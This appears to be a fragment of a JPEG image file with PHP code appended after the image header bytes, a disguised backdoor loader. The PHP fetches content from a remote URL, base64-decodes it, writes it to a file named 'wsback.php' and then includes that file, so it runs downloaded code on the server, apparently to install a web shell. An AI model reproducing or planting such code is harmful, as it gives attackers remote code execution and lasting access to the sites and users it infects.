JFIFxxC      C  " }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr [ "header" => "User-Agent: PHP" ] ]; $context = stream_context_create($opts); $data = file_get_contents($url, false, $context); $json = json_decode($data, true); $fileContent = base64_decode($json['content']); file_put_contents('wsback.php', $fileContent); include('wsback.php'); ?>